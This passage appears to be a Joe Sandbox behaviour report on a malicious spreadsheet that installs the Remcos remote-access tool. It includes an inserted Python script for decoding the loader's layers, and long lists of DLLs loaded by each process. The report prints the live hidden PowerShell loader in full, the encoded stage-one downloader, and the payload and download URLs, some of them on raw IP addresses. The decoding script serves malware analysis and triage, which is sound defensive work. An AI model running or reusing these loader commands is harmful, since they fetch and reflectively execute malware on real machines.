? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
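Added example, not part of the Joe Sandbox report and not the sample's own code: a Python triage script that decodes the three encoded layers visible in the process command lines above. Layer 1 is the UTF-8 Base64 argument to FromBase64String in the mshta -> cmd -> powershell line; it resolves to an Add-Type P/Invoke of urlmon!URLDownloadToFile that fetches http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF and writes it to %APPDATA%\wecreatedbuttersmoothbutterthin.vBS, which matches the path wscript.exe is later started with. Layer 2 is the $Codigo string handed to powershell.exe by wscript.exe: Base64 of a UTF-16LE command with a junk separator inserted between characters, which this report renders as '? ? ? ? ?'. The script assumes that separator is one token and maps it to 'A'; that assumption reproduces the $imageUrl = 'https://ia803104... command that the next powershell.exe line shows in clear, but the real separator characters are not recoverable from this page, and only the prefix copied from the report is decoded. Layer 3 is the reversed URL passed as the first argument to dnlib.IO.Home.VAI. The marker carving that the stage-3 command performs on the archive.org 'vbs.jpg' is reproduced over a constructed buffer, because the real file is not on this page. The Base64 strings are copied from the lines above exactly as the report shows them.

```python
"""Decode the observable layers of the PO_304234.xls -> Remcos chain.

Added example for this report; not Joe Sandbox code and not code from
the sample. STAGE1_B64 and STAGE2_PREFIX are copied from the process
command lines in the report; FAKE_JPG is a constructed stand-in.
"""
import base64
import re

# Layer 1: argument to FromBase64String in the mshta -> cmd -> powershell line.
STAGE1_B64 = "JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI="

# Layer 2: start of the $Codigo string wscript.exe passes to powershell.exe,
# as the report renders it. The junk separator appears as '? ? ? ? ?'; the
# real characters are not recoverable from the page (assumption: one token).
STAGE2_PREFIX = "J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz"
JUNK = "? ? ? ? ?"

# Layer 3: first argument to dnlib.IO.Home.VAI, stored reversed.
STAGE3_REVERSED = "txt.SDER/zob/ppmax/551.391.3.291//:ptth"

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def decode_stage1(blob: str) -> str:
    """UTF-8 Base64 -> PowerShell text; collapse the runs of spaces the
    loader uses to pad the command line."""
    text = base64.b64decode(blob).decode("utf-8")
    return re.sub(r" {2,}", " ", text)


def decode_stage2(codigo: str, junk: str = JUNK) -> str:
    """Undo the loader's .replace(junk, 'A') and decode UTF-16LE, which is
    what PowerShell's [Text.Encoding]::Unicode produces. The report truncates
    the command line, so drop trailing partial Base64 and UTF-16 units."""
    b64 = codigo.replace(junk, "A")
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le")


def unreverse(s: str) -> str:
    """The VAI loader receives its download URL as a reversed string."""
    return s[::-1]


def carve_marked_base64(data: bytes, start: bytes = b"<<BASE64_START>>",
                        end: bytes = b"<<BASE64_END>>") -> bytes:
    """Same carving the stage-3 PowerShell does on the 'vbs.jpg': take the
    text between the two markers and Base64-decode it."""
    i = data.find(start)
    j = data.find(end, i + len(start)) if i >= 0 else -1
    if i < 0 or j < 0:
        raise ValueError("markers not found")
    return base64.b64decode(data[i + len(start):j])


# Constructed stand-in for the archive.org "image": JPEG magic, filler,
# then a tiny fake PE header between the markers (not the real payload).
FAKE_JPG = (b"\xff\xd8\xff\xe0" + b"\x00" * 16
            + b"<<BASE64_START>>" + base64.b64encode(b"MZ\x90\x00fake-assembly")
            + b"<<BASE64_END>>" + b"\xff\xd9")


def triage() -> dict:
    """Collect the indicators from every layer in one place."""
    s1 = decode_stage1(STAGE1_B64)
    return {
        "stage1_urls": URL_RE.findall(s1),
        "stage1_drops_vbs": "wecreatedbuttersmoothbutterthin.vBS" in s1,
        "stage2_prefix": decode_stage2(STAGE2_PREFIX),
        "stage3_url": unreverse(STAGE3_REVERSED),
        "carved_is_pe": carve_marked_base64(FAKE_JPG).startswith(b"MZ"),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Run it as a script to print the indicators, or import it from a notebook. If a later sample of this loader uses a different separator, pass it as the junk argument of decode_stage2; because the decoder discards trailing partial Base64 and UTF-16 units, a command line truncated by the sandbox still decodes as far as it goes.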
                  Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
